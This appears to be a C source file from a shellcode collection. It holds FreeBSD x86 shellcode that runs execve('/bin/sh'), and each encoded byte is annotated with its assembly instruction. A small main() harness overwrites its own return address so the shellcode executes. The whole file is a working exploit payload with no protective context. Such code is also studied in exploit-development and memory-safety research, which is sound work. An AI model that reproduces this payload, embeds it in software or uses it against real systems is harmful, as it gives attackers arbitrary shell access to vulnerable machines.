/*
 * execve /bin/sh FreeBSD x86 shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "execve /bin/sh 0 0"

#include <stdio.h>

char shellcode[] =    

/* jump to G2C */
"\xeb\x0b"			// jmp    804808d <G2C>

/* start <shellcode> */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax

/* execve /bin/sh */
"\x50"				// push   %eax
"\x50"				// push   %eax
"\x56"				// push   %esi
"\xb0\x3b"			// mov    $0x3b,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* G2C */
"\xe8\xf0\xff\xff\xff"		// call   8048082 <shellcode>
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    8048101 <G2C+0x74>
;

int
main()
{
	int *ret;
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	printf("Shellcode length = %d\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}